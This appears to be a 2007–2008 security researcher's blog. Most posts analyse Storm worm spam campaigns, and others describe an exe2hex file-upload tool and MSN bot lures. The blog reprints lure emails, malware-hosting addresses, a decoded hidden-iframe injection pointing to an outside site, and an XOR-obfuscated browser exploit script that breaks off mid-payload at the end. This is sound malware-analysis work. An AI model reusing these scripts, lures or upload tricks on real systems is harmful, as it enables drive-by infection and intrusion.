John H. Sawyer

exe2hex.rb: old school pwnage

2008-05-20T02:02:00.005-04:00

I figured I'd better put this up before I keep having more ideas of how to improve it and never end up posting it.

What is it? Just over a month ago, a buddy (who's recently begun working for a BIG company that just happens to do some pentesting) was telling me about a pentest where they weren't allowed to upload software so he had to write something in a batch file. While we were chatting, I began telling him of the different ways I've seen attackers put files on Windows systems: tftp, ftp (with & without scripts), wget-like VBscript and echo.

While echo was integral in most of the above techniques (ftp script & VBscript), I'd seen a handful of hacks back in 2005 where an attacker used echo and pasted hex into a file. When the file was complete, he ran "debug < 123.hex". Renamed the resulting file to end with ".exe" and his tool was complete.

After digging through some really old incidents I'd investigated, I found some real world examples of the technique used during compromises. A little bit of Google-ing revealed these two links to a forum post describing the technique in 2004 and mention in a Phrack article.

After sitting in on part of Ed Skoudis' new Security 560 Penetration Testing class, I saw that his class didn't mention this technique but it covered just about all the others above. Since I would one day like to be efficient at writing ruby, I wrote exe2hex.rb based on the C code from Riftor.

Currently, due to a limitation in Microsoft's debug.exe, files must be smaller than 65,280 bytes. My next version will automatically split up files to be under the correct size and convert each one to hex. Once echo'd and converted on the target host, the individual files can be joined with "copy file1+file2+file3 /b dest /b" (or at least it should work that way...need to do more testing).

Where does this tool come in handy...I have some ideas but they'll have to wait. I need to pack things up here in the lab and head home.

Storm <3's You!

2008-01-15T14:01:00.000-05:00

Storm (Nuwar, CME711, etc) just reminded me that Valentine's is less than a month away. I've gotten four recycled e-mails looking to spread some love. When I first got the copies, only two AV vendors (NOD32v2 & Webwasher-Gateway) on VirusTotal.com were detecting it as malicious.

Subject: Our Love is Free
Body: When Love Comes Knocking http://69.212.48.3/

Subject: I Love Thee
Body: Words in my Heart http://24.1.116.187/

Subject: A Is For Attitude
Body: A Dream is a Wish http://222.107.37.211/

Subject: Eternity of Your Love
Body: The Moon & Stars http://68.57.210.178/

The webpage contains some URL encoded text that links to "with_love.exe"

'%3C%61%20%68%72%65%66%3D%22%77%69%74%68%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A'

Tethering a Verizon BlackBerry 8830 with Mac OS X Leopard

2007-11-04T17:44:00.000-05:00

These settings go into System Preferences under the Network area. You have to add a Bluetooth device and pair the phone with modem. If you don't know how, read the forum post that got me this far. The forum works great with Tiger but did not work with Leopard. I had to make changes to the Advanced area to get it to work properly.

Username: PHONE_NUMBER@vzw3.com (not sure how important this is, I've done it with the BlackBerry Internet Server username also)
Password: vzw
Telephone: #777

Advanced button
Vendor: Generic
Model: Dialup Device
(Leave the rest as defaults)

Ruby snippet for URI decoding

2007-11-02T15:50:00.000-04:00

Ruby Module URI::Escape

I was doing some quick analysis of a page that had some obfuscated javascript with some URI encoded text. Usually, I pull out the javascript and run it through SpiderMonkey (or Didier Stephen's modified version) to see what's going on. Recently, Jordan and I were talking about CLI tools for doing encoding/decoding of things in hex, URI, binary and similar.

So, I took this opportunity to figure out the Ruby for deobfuscating something like this:

eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e
%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66
%72%61%6d%65%20%6e%61%6d%65%3d%39%61%37%62%34%37%32%32%20%73%72%63
%3d%5c%27%68%74%74%70%3a%2f%2f%69%6c%6f%76%65%6d%79%6c%6f%76%65%73
%2e%63%6f%6d%2f%74%72%61%66%66%2e%70%68%70%3f%27%2b%4d%61%74%68%2e
%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%35
%32%37%36%29%2b%27%37%61%33%62%36%38%30%39%66%38%5c%27%20%77%69%64
%74%68%3d%32%30%31%20%68%65%69%67%68%74%3d%37%36%20%73%74%79%6c%65
%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69
%66%72%61%6d%65%3e%27%29"));

Which this:

ruby -e 'require "uri"; p URI.unescape("<junk_from_above>")'

Returns this:

"window.status='Done';document.write('<iframe name=9a7b4722 src=\\'http://ilovemyloves.com/traff.php?'+Math.round(Math.random()*15276)+'7a3b6809f8\\' width=201 height=76 style=\\'display: none\\'></iframe>')"

VMware Server 1.0.4 on Ubuntu Server 7.10 (Gutsy Gibbon)

2007-10-24T23:53:00.000-04:00

Note to self:
sudo apt-get install libxrender1 libxt6 libxtst6 libx11-6 build-essential xinetd linux-headers-2.6.22-14-server

I've heard VMware is available from one of the repositories, but I've not tried it. This is for installs from the downloaded tarball.

Play that funky mus...stock spam, Storm

2007-10-18T09:58:00.000-04:00

Storm has been sending out pump and dump spam for quite a while with everything from plain text to images to zips. Now, it's throwing MP3's at us. Here are two files below. So far, the subjects have been blank with "Re:" or "Fwd:".

Of note, the X-Mailer is "Microsoft Outlook Express 6.00.2800.1106" but that varies with each new iteration of storm. I've seen it claim to be Thunderbird in the past.

coolringtone.mp3
firstdance.mp3

Because there is no patch...

2007-10-17T13:50:00.000-04:00

...for human stupidity. Which is why Storm keeps spreading. There is simply no excuse for people to continue infecting themselves. I'd take a stab and antivirus companies but they simply can't keep up. Until they all move to true behavioral-based detection, they won't be able to handle the flood of malware coming from the miscreants out there.

Today, Storm worm brings us a new attempt to infect people by getting them to believe that there's a new filesharing application called Krackin. Great!

Below are samples of the e-mails, screenshots and the javascript exploits.

Subject:re: krackin is released
Body:New Sharing network goes live. Check out Krackin here.
http://xx.90.44.73/

Subject:re: krackin is online
Body:Ok, last time I am sending you this linkman. LOL write it down or
soothing. This is krackin. http://xx.74.85.128/

Subject:man here is the link
Body:man here is the next huge sharing network. It is friggin awesome. Check
it out. http://xx.37.24.109/

Here's a text file of the javascript exploit code. Handle with care!

Kitties say Storm is better than catnip!

2007-10-11T22:12:00.000-04:00

Just when I think there's nothing new going on with Storm, in flies a few new e-mails. This time it has similar content as before, but with the hook being a cute, crazy kitty cat.

Subject: You have just received an ecard.
Body: Check out the original Crazy Cat Card. It is too funny for words.
http://75.4.70.217/

Subject: Check out your ecard.
Body: Click here to view your laughing kitty card online. http://74.138.11.91/

Subject: You've got a greeting just for you!
Body: Please click here to view your Crazy Kitty Card Online.
http://99.162.220.182/

Here's a screenshot of the page:

After looking at the source and downloading the Flash animation (the cat), I used Flare to extract any scripts. I found the the original file came from http://www.superlaugh.com/1/catnip.swf Both files were the same size but MD5's did not match.

movie 'catnip.swf' {
// flash 4, total frames: 127, frame rate: 12 fps, 360x450 px
frame 1 {
ifFrameLoaded (4) {
gotoAndPlay(3);
}
}
frame 2 {
gotoAndPlay(1);
}
movieClip 5 {
}
button 7 {
on (release) {
getURL('http://www.superlaugh.com', '_top');
}
}
movieClip 14 {
}
frame 125 {
gotoAndPlay(3);
}
}

The links on the page all go to SuperLaugh.exe which was caught by 70% of scan engines on Virus Total. Obfuscated Javascript was found at the bottom just like some previous versions. It looked to be the same exploits that have been being used on and off since I first started looking into Storm about a month or two ago.

Also, all the images, including the kitty Flash file, were sourced from the "/img" directory but it did not allow browsing of directories.

Links for AITP and FAEDS presentations

2007-09-25T22:20:00.000-04:00

Thank all of you for attending my presentation. If you have any questions, please don't hesitate to e-mail me. Here are links to many of the things I talked about and demonstrated along with several that I didn't have time to get to.

My Websites
-----------------------------------
Personal Blog
http://www.johnhsawyer.com

Dark Reading Blog
http://www.darkreading.com/blog.asp?blog_sectionid=447

UF IT Security Team
http://infosec.ufl.edu

Malware Analysis and Sandboxes
-----------------------------------
VirusTotal (submit files for analysis)
http://www.virustotal.com/

CWSandbox - Behavior-based Malware Analysis
http://www.cwsandbox.org/

Anubis: Analyzing Unknown Binaries
http://analysis.seclab.tuwien.ac.at/index.php

Norman Sandbox
http://www.norman.com/microsites/nsic/Submit/en

Mandiant Red Curtain
http://www.mandiant.com/mrc

PEiD
http://www.secretashell.com/codomain/peid/

pefile (for you Python programmers)
http://dkbza.org/pefile.html

Firefox Extensions and SpiderMonkey
-----------------------------------
NoScript
http://noscript.net/

User Agent Switcher
http://chrispederick.com/work/web-developer/

WebDeveloper
http://chrispederick.com/work/web-developer/

SpiderMonkey
http://www.mozilla.org/js/spidermonkey/

Incident Response Tools (& more)
-----------------------------------
Sysinternals
http://www.microsoft.com/technet/sysinternals/default.mspx
(autoruns, tcpview, filemon, regmon, process moniopenports, tor, process explorer, pstools)
Sysinternals Suite (all tools in one download)
http://www.microsoft.com/technet/sysinternals/Utilities/SysinternalsSuite.mspx

DiamondCS
http://www.diamondcs.com.au/consoletools.php
(cmdline, openports)

Wireshark - sniffer and protocol analzer (formerly Ethereal)
http://www.wireshark.org

Helix - CD designed for incident response and forensics (Linux & Windows tools)
http://www.e-fense.com/helix/

Some Security Blogs
-----------------------------------
SANS Internet Storm Center
http://isc.sans.org

Windows Incident Response (Harlan Carvey) - event logs, registry and memory analysis & more
http://windowsir.blogspot.com/

int for(ensic){blog;} (Andreas Schuster) - event logs and memory analysis
http://computer.forensikblog.de/en/

Centralizing Windows Event Logs
-----------------------------------
Series of Posts on DarkReading about logs:
Log Central
http://www.darkreading.com/blog.asp?blog_sectionid=447&doc_id=132446
How to Centralize Windows Event Logs (links to Snare and Lasso)
http://www.darkreading.com/blog.asp?blog_sectionid=447&doc_id=132709
Watch Out for That Log!
http://www.darkreading.com/blog.asp?blog_sectionid=447&doc_id=133005

Miscellaneous Links
-----------------------------------
Metasploit Framework
http://framework.metasploit.com/

VMware (Workstation for Linux & Windows, Fusion for Mac, Server and Player are FREE )
http://www.vmware.com

Process memory dumping tools

2007-09-20T16:54:00.000-04:00

This is from a post I had over at ForenisFocus.com. I'm working on a presentation and was trying to come up with a list of all the useful process dumpers for Windows, so I did a little Googling and found my old post. So, I stuck it here for my own future reference.

Everyone already knows about dd for Windows from George M. Garner so I won't discuss it any further. Until, the tools like those developed in the 2005 DFRWS memory forensic challenge are released, dd memory images are only as useful as the strings you pull out of them.

There is some promising research from Mariusz Burdach who just spoke at BlackHat Federal 2006 on "Finding Digital Evidence in Physical Memory." His website is located at http://forensic.seccure.net/ but his documentation memory forensics is more up-to-date on the BlackHat Media Archives page. The tools/docs archive even has the Windows version of wmft.exe which isn't on his webpage yet (just the linux version of wmft is there).

Memdump was mentioned but there are at least two different versions for Windows that I know of. The one mentioned previously by APsoft and another from the Metasploit project.

APsoft's memdump will do any or all of memory.

MEMDUMP/386 for DOS Version 2.00 - Release 15-Jun-2005
(C) Copyright 1993-2005 by APSoft (http://www.tssc.de)
All rights reserved.  Disassembly or decompilation prohibited.

This program dumps or copy any part of 4GB memory address space of your system.
For proper access to hardware registers, memory can be read with BYTE, WORD or
Double WORD granularity.

Syntax: MEMDUMP [/H|?]
                [/D[B|W|D][:Address[,Length]]]
                [/F:filename|none]
                [/B:filename]

 where: /H              - Print this text
        /D[B|W|D][:Address[,Length]]
                        - Dump <Length> number of memory bytes from specified
                          linear <Address> as bytes (DB), words (DW) or
                          double words (DD) correspondingly.
        /F:filename     - Output file for the dump (Default: console)
                          Use /F:none to completely suppress dump
        /B:filename     - Output file for the binary contents of memory

 Notes: Both 'Address' and 'Length' can be expressed in hexadecimal format
        with '0x' prefix. The 'Length' field can be also expressed in decimal
        Examples:

          MEMDUMP /DW:0x100000,0x100000 /F:2ndMB.dmp - dump second MB to file
          MEMDUMP /DB:0x100000,128                   - dump 128 Bytes to CON:
          MEMDUMP /D:0,0x100 /F:none /B:IntTB.bin    - copy INT table to file

        If dump or binary file exists, MEMDUMP unconditionally overrides it.

        If you are using WORD or DWORD access 'Length' parameter should be
        multiple of 2 or 4 correspondingly.

        Please remember that if the memory manager (such as EMM386.EXE) is
        loaded, MEMDUMP will read linear address rather as physical address.

There is almost no help for the Metasploit memdump. It dumps specific processes by giving it a PID and creates quite a few files that are to be analyzed with msfpescan. The file names looks to be based on the section of memory it is pulled from. Msfpescan is crashing on my Mac OS X box right now so can't show you the output but here is the syntax and sample of memdump running.


C:\>y:\memdump.exe
Usage: y:\memdump.exe pid [dump directory]

C:\>y:\memdump.exe 2796
[*] Creating dump directory...2796
[*] Attaching to 2796...
[*] Dumping segments...
[*] Dump completed successfully, 49 segments.

Then, there is pmdump that also dumps processes.


pmdump 1.2 - (c) 2002, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
           - http://ntsecurity.nu/toolbox/pmdump/

Usage: pmdump <pid> <filename>
        - dumps the process memory contents to a file

       pmdump -list
        - lists all running processes and their PID's

Microsoft has several versions of userdump but I think the latest is version 8.0 and is less than a month old. As with Metasploits memdump, there is another tool that can read the dumped output. Dumpcheck is that tool and is part of the debugging tools package. For it to be most useful, you need the symbols, also.


User Mode Process Dumper (Version 8.0.2826.0)
Copyright (c) 1999-2005 Microsoft Corp. All rights reserved.

userdump -p
    Displays a list of running processes and process IDs.

userdump [-k] <ProcessSpec> [<TargetDumpFile>]
    Dumps one process or processes that share an image binary file name.

    -k optionally causes processes to be killed after being dumped.

    <ProcessSpec> is a decimal or 0x-prefixed hex process ID, or the
        base name and extension (no path) of the image file used to create
        a process.

    <TargetDumpFile> is a legal Win32 file specification. If not specified,
        dump files are generated in the current directory using a name
        based on the image file name.

userdump -m [-k] <ProcessSpec> [<ProcessSpec>...] [-d <TargetDumpPath>]
    Same as above, except dumps multiple processes.

    -d <TargetDumpPath> supplies the directory where the dumps will go.
        The default is the current directory.

userdump -g [-k] [-d <TargetDumpPath>]
    Similar to above, except dumps Win32 GUI apps that appear hang.

userdump -I [-d <TargetDumpPath>]
    To change just in time debugger to UserDump.
    This command will not actually start UserDump.
    If you don't setup userdump, please copy userdump.exe to %windir%\system32.

    -d <TargetDumpPath> supplies the directory where the dumps will go.
        The default is a current directory of the target process.

That's it that I can think of for now. I will probably remember the other one or two tonight. Hope all that helps give you some direction and a realization that there is no specific way to analyze memory, but quite a few people are interested and several smart people are doing some excellent research into the area.

MSN bot making the rounds

2007-09-18T10:58:00.000-04:00

It has handy commands like main.wget, main.remove, msn.url, msn.self and msn.stop.

If you get one of the following and it includes a link to a site like photobucket.com or similar, don't click it. This came straight from a txt file an IRC bot was using as its source of deceptive messages being sent to MSN users.

This picture isnt you... right?
Wow i think i found your pic on myspace!
hey did i ever show you this picture of me?
can i up some of these pics of ya to my myspace profile?
you care if i put this pictuer of you in my new album?
sry about the messup i fixed the pic! Try it one more time plz
Can i put this pic of you into my new myspace album?
this looks like you lol
haha this guy up my street just slammed his $90k car into a telephone pole! I got a pic of it with my cellphone
Wanna see my pics before i send em to facebook?
do you think this picture is too kinky for Myspace?
I think this picture is terrible. but my friends on myspace want to see it. please dont show noone.
Have you seen me Naked Yet :D
ok I DO NOT like my new hair color.. but people on facebook do. what do you think? And no laughing! lol
hey you got a myspace album? anyways heres my new myspace album :) accept k?
do I look dumb in this picture? I want to put it on myspace.

Storm brings "games" that pack a punch

2007-09-15T17:09:00.000-04:00

Today, Storm includes e-mails about free games available. The e-mails are resorting back to including URLs to IP addresses and not a domain like the most recent NFL messages. The web page includes pictures of all sorts of games and links to "ArcadeWorld.exe".

The Storm worm folks are also resorting to including exploit code. My guess is they just didn't get the number of infections they were hoping to with just including links to the *.exe with the NFL version.
Here's a screenshot of the obfuscated javascript.

This is after the first round of deobfuscating the javascript using SpiderMonkey. See how there's still more to analyze. The overly long filename for the WMV file looks like it is targeting MS06-006.

The do/while loop creates a string of 16,777,216 A's that gets the shellcode appended to the end.

Subject: Quick, grab this
Body: Click here to get over 1000 games for free http://xxx.0.188.5/

Subject: Quick, grab this
Body: Stop paying for games; we have over 1000 games for free online http://xx.57.250.77/

Subject: Thousands of hours of fun, for free
Body: Go http://xx.203.41.160/

Subject: Stop paying for games
Body: 1000 Online Free games, take a look http://xx.38.52.177/

Subject: The internet just got better
Body: Look http://xxx.54.195.27/

freeNFLtracker.com now in use by Storm worm

2007-09-13T14:02:00.000-04:00

Messages just started pouring in with links to http://freeNFLtracker.com/ instead of individual IP addresses. If you can blackhole the DNS, do so immediately to prevent users from being able to resolve the domain.

There is still no exploit code in the webpage, but it probably won't be long before it is included. I'm guessing the current page is so effective at getting users to click and run that there isn't a need for automatic exploitation.

Subject: Are you ready for football season?
Body: Want to know all the stats all the time this season? Get your free NFL Season Tracker!
http://freeNFLtracker.com/

Subject: Are you ready for football season?
Body: Are you ready for tonight's game? How about the whole season? Do you have your NFL Season Tracker?
http://freeNFLtracker.com/

Subject: The season has started
Body: Know every player and every stat, with this years Real-time NFL Tracker.
http://freeNFLtracker.com/

Here's the registrar info for FREENFLTRACKER.COM. For obvious reasons, they're using a privacy service to block the real registrant info.

Registration Service Provided By: LOMTI INC.
Contact: +351.3456712

Domain Name: FREENFLTRACKER.COM

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 65
All Postal Mails Rejected, visit Privacyprotect.org
Monster
null,2680 AB
NL
Tel. +45.36946676

Creation Date: 13-Sep-2007
Expiration Date: 13-Sep-2008

Domain servers in listed order:
ns13.freenfltracker.com
ns12.freenfltracker.com
ns11.freenfltracker.com
ns10.freenfltracker.com
ns9.freenfltracker.com
ns8.freenfltracker.com
ns7.freenfltracker.com
ns6.freenfltracker.com
ns5.freenfltracker.com
ns4.freenfltracker.com
ns3.freenfltracker.com
ns2.freenfltracker.com

Go! Fight! Storm..uhm..Score!

2007-09-08T16:53:00.000-04:00

Just in time for football season, Storm worm is now targeting football fans with a free online game tracker. The page is much more elaborate than any of the others so far with more graphics, a table and an image map. Every link on the page goes to "tracker.exe" and there is no obfuscated javascript or exploit code in the page itself. It is solely relying on users to click and run the "tracker.exe".

Subject: FOOTBALL! Are You ready?
Body: Football Season Is Finally here!
Never miss a game again, and know all the stats.
Get you data online everyday from our free game tracker:
http://xx.179.106.14/

Subject: Free NFL Game Tracker
Body: Are you ready for some football?
Let us keep you on top of every game everyday.
Never be in the dark again with this online game tracker:
http://xx.8.83.172/

Subject: Do you have your NFL Game List?
Body: Football is back, Life may resume again!
We can keep you on top of every single game this season.
Get all your game info daily from our online game tracker:
http://xx.248.200.167/

Subject: Are you ready for some football?
Body: Life as we know it is back, NFL season is open.
Let us keep you on top of every game everyday.
Get all your game info daily from our online game tracker:
http://xx.211.219.222/

sTORm preying on file sharers

2007-09-06T09:22:00.000-04:00

This came in at 7:02am this morning after about two days of nothing new from Storm. Now they are promoting Tor for file sharers to protect themselves from "Big Brother." Tor anonymizes online activity by encrypting and tunneling network traffic through random Tor exit nodes all around the world. It is nice to see Tor getting some recognition, but hopefully, it won't lead to too many new infections.

Here's a copy of the e-mail and a screenshot of the page.

Subject: Big brother is watching you.
Body: Do you trade files online? Then they will come after you. The news is full of articles of lawsuits by the RIAA. This program protects your online identity. Save yourself from an attack and use this free software now. Download Tor

A Stormy Labor Day celebration

2007-09-04T16:52:00.000-04:00

I did have a stormy Labor Day weekend in Hilton Head over the long holiday weekend, but my Inbox also received new copies of Storm worm hoping to trick users into infecting themselves. They either tell users they have a new e-card or there is a holiday greeting card waiting for them. The host with the malicious content has a cute Labor Day picture that links to "labor.exe"

All the same nasty obfuscated Javascript exploit code is still there and doesn't appear to have changed from what we were seeing last week.

Subject: Happy Labor Day
Body: Someone has sent you an E-Card. To view it, follow this link: http://ecards.com/funcard/edelivery?xz2dl2ifbi6r80hzk

Subject: The Big Labor Day Weekend
Body: Here is the link to view your holiday greeting online: http://hallmark.com/ecards/labor1?j7hesyq65ubntze680a1p67969wt2

Subject: Your friend has sent you a card.
Body: Click here to pick up your greeting card: http://netcards.com/cards/edelivery?p9n2q90enz4afj0

I do most of my javascript deobfuscation using technique #4 as detailed by Daniel Wesemann on the SANS Internet Storm Center site (http://isc.sans.org). I'll probably go over how I do it in a little more detail in an upcoming post.

Quick template mod

2007-08-30T11:22:00.000-04:00

I had to mod the Blogger template because it was feeling a bit restrictive and making the long posts scroll. Personally, I read blogs through Google Reader but there is still a lot of people that go straight to the blog site so this should make it easier for all of you.

Also, I was thinking of changing the title of the blog. Right now, it is "John H. Sawyer" which is because I'm too lazy to have come up with an original one. My DarkReading blog is called "Evil Bits" which Ben told me yesterday should be called "Naughty Bits." ;-) Thanks, Ben. Any ideas for blog titles?

Rock bands get a little Storm love

2007-08-29T10:45:00.000-04:00

Whether that is good or bad, I'm sure it's going to make some college students and teens want to click on it. Two messages made it through this morning (see below). Today's Storm executable is "codec.exe". Even though the Storm worm host is serving up "codec.exe" as the current trick to get users to install (if they don't get owned by the embedded exploits first), it still usually hosts other EXE's based on previously seen names like "applet.exe", "video.exe", etc. The obfuscated javascript and exploits look to be the same as yesterday.

On this host, I was able to pull both "video.exe" and "codec.exe" but not "applet.exe"--at least, not a Storm binary. (I didn't bother trying the other half dozen filenames used in the past).

Here's there file sizes, md5's and content of the page returned by the "applet.exe" request.

140367 Aug 29 10:52 codec.exe
140367 Aug 29 10:52 video.exe
529 Aug 29 10:52 applet.exe

MD5 (applet.exe) = 37fe7efbebfe417c25a92f76d163ea3b
MD5 (codec.exe) = 1ef03f4830c530799c57d67e1ccadc59
MD5 (video.exe) = 1ef03f4830c530799c57d67e1ccadc59

applet.exe: HTML document text
codec.exe: MS-DOS executable (EXE), OS/2 or MS Windows
video.exe: MS-DOS executable (EXE), OS/2 or MS Windows

Page content returned from "applet.exe" request.

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.5.17</center>
</body>
</html>

And, here's the content of the new e-mails.

Subject: Hot new video
Body: Foo Fighters just made a video you have got to see.

Be the first to see it. Click on the link to pull it off my server:
http://xx.25.176.66/

and

Subject: this video rockx
Body: Velvet Revolver
Check it out first. Go here for the video: http://xx.106.206.111/

Just got this one...

Subject: this video is not out yet
Body: Fat Boy just filmed their new video.

Be the first to see it. Click here to download it: http://xxx.211.45.200/

Storm takes one step back, six steps forward

2007-08-28T11:58:00.001-04:00

I was getting bummed since I hadn't seen any Storm worm infection letters since yesterday around 3pm, but Storm worm loves me and would never leave me hanging. This just came in.

Subject: Helps us out and let us say thanks
Body: We are looking for Consumer opinions of our new software Home Reno Planner

This beta testing will enable us to fine tune the software for public release. A free copy of the program plus free updates will be yours for helping out.

Download the software, See What you think, and Email us your thoughts. If you would like to help us with this no obligation Beta test, follow this link to our secure download server: http://xx.183.196.147/setup.exe

Where is the obfuscated link to the IP? I was surprised to see the raw IP listed along with a link directly to an EXE. It is definitely Storm worm hosting the malware. A quick download and check of the server header shows:

HTTP/1.1 200 OK
Server: nginx/0.5.17
Date: Tue, 28 Aug 2007 14:59:22 GMT
Content-Type: application/octet-stream
Content-Length: 140367
Connection: close
Accept-Ranges: bytes

Bringing up http://xx.183.196.147/ without the "setup.exe" shows it is also doubling as a StormTube host complete with obfuscated Javascript that contains a shotgun approach to exploiting the web browser. A cursory glance show about a half dozen exploits that may be for IE WebViewFolderIcon setSlice(), WinZip WebViewFolderIcon, Yahoo WebCam, Microsoft 'msdds.dll' COM Object, QuickTime and AdobeWScriptShell.
Since including code in the body of the blog is a pain, here's the files if you want to play with them.

Wish List: PE Posters

2007-08-28T10:25:00.001-04:00

Ero Carrera has created a CafePress store to sell poster-sized versions of his "Portable Executable Format: A File Walkthrough" and "Portable Executable Format."

How hot are these? Check out his blog post about it for more info.

The Ever Changing Storm

2007-08-23T10:51:00.000-04:00

Storm worm just keeps rolling with the punches. After you warn users, family and friends about the bogus messages and how to identify them, Storm changes it up. This time, they learned that users might not click on an IP address so they've obfuscated it with HTML.

Welcome,

We are glad you joined Free Ringtones.

Account Number: 895942644
Login ID: user2662
Your Password ID: zi461

For security purposes please login and change the temporary Login ID and Password.

Click on the secure link or paste it to your browser: Free Ringtones

Thank You,
Welcome Department
Free Ringtones

OMG, what are you doing man. This video of you is all over the net. check it out yourself http://www.youtube.com/watch?v=pQoPSGAGXMW

or...there's just too many to include. It's quite amazing. When the messages were pr0n related with subjects like "Do you think my bra is too tight. Maybe I should take it off. let me know what you think" and "Oh man I found these pictures of my ex-secretary on her computer after I fired her. Check em out!", they all had the following in their header:

X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700

The new membership e-mails don't have any mail client info. The Storm worm host directed to by the e-mail does have some obfuscated javascript with exploit payload. Note: some of this code is going to scroll off the screen. I just couldn't figure out an elegant way of doing it so it's just gonna look like crap. ;-)

<img src="http://www.youtube.com/img/pic_youtubelogo_123x63.gif">
<br><br>Your Download Should Begin Shortly. If your download does not start in approximately 15 seconds, you can <a href="/video.exe">click here</a> to launch the download and then press Run.

<Script Language='JavaScript'>

function xor_str(plain_str, xor_key){ var xored_str = ""; for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; }

var plain_str = "\xb3\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\xaf\xdb\xc7\xde\xdf\xad\xaf\xdb\xd6\xd2\xd7\xad\xaf\xc0\xd0\xc1\xda\xc3\xc7\xad\xe5\xf2\xe1\xb3\xe0\xae\xe6\xfd\xf6\xe0\xf0\xf2\xe3\xf6\xbb\xb1\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb1\xba\xa8\xf7\xfc\xe8\xe0\xb8\xae\xe0\xa8\xee\xe4\xfb\xfa\xff\xf6\xbb\xe0\xbd\xff\xf6\xfd\xf4\xe7\xfb\xaf\xa3\xeb\xa3\xaa\xa3\xa3\xa3\xa3\xa3\xba\xa8\xe0\xb8\xae\xe6\xfd\xf6\xe0\xf0\xf2\xe3\xf6\xbb\xb1\xb6\xe6\xa6\xa7\xd6\xd1\xb6\xe6\xa4\xa6\xab\xd1\xb6\xe6\xab\xd1\xa0\xd0\xb6\xe6\xa0\xa6\xa4\xa7\xb6\xe6\xa3\xa0\xa4\xab\xb6\xe6\xa6\xa5\xd5\xa6\xb6\xe6\xa4\xa5\xab\xd1\xb6\xe6\xa3\xa0\xa1\xa3\xb6\xe6\xa0\xa0\xd5\xa6\xb6\xe6\xa7\xaa\xd0\xaa\xb6\xe6\xd2\xd7\xa7\xa2\xb6\xe6\xd7\xd1\xa0\xa0\xb6\xe6\xa3\xd5\xa0\xa5\xb6\xe6\xa2\xa7\xd1\xd6\xb6\xe6\xa0\xab\xa1\xab\xb6\xe6\xa4\xa7\xd5\xa1\xb6\xe6\xd0\xa2\xa3\xab\xb6\xe6\xa3\xd7\xd0\xd1\xb6\xe6\xd7\xd2\xa3\xa0\xb6\xe6\xd6\xd1\xa7\xa3\xb6\xe6\xa0\xd1\xd6\xd5\xb6\xe6\xa4\xa6\xd7\xd5\xb6\xe6\xa6\xd6\xd6\xa4\xb6\xe6\xa6\xd6\xab\xd1\xb6\xe6\xa3\xa0\xa1\xa7\xb6\xe6\xa5\xa5\xd7\xd7\xb6\xe6\xa3\xd0\xab\xd1\xb6\xe6\xab\xd1\xa7\xd1\xb6\xe6\xa2\xd0\xa6\xd6\xb6\xe6\xd7\xd7\xa3\xa0\xb6\xe6\xa3\xa7\xab\xd1\xb6\xe6\xa3\xa0\xab\xd1\xb6\xe6\xd0\xa0\xd0\xa6\xb6\xe6\xa4\xa1\xa4\xa6\xb6\xe6\xa5\xd7\xa5\xd0\xb6\xe6\xa5\xd6\xa5\xd5\xb6\xe6\xa5\xa7\xa1\xd6\xb6\xe6\xa5\xd0\xa5\xd0\xb6\xe6\xa7\xa0\xa3\xa3\xb6\xe6\xa6\xd0\xa0\xd2\xb6\xe6\xa1\xd6\xa6\xa6\xb6\xe6\xa4\xab\xa5\xa6\xb6\xe6\xa3\xa3\xa5\xa6\xb6\xe6\xd0\xa3\xa0\xa0\xb6\xe6\xa3\xa0\xa5\xa7\xb6\xe6\xa0\xa3\xa7\xa3\xb6\xe6\xa3\xd0\xa4\xab\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xab\xd1\xa3\xd0\xb6\xe6\xa2\xd0\xa4\xa3\xb6\xe6\xab\xd1\xd2\xd7\xb6\xe6\xa3\xab\xa7\xa3\xb6\xe6\xa3\xaa\xd6\xd1\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xab\xd7\xa0\xa7\xb6\xe6\xa4\xd0\xa7\xa3\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xaa\xa6\xa0\xd0\xb6\xe6\xab\xd6\xd1\xd5\xb6\xe6\xa3\xd6\xa7\xd6\xb6\xe6\xd6\xab\xd6\xd0\xb6\xe6\xd5\xd5\xab\xa7\xb6\xe6\xd5\x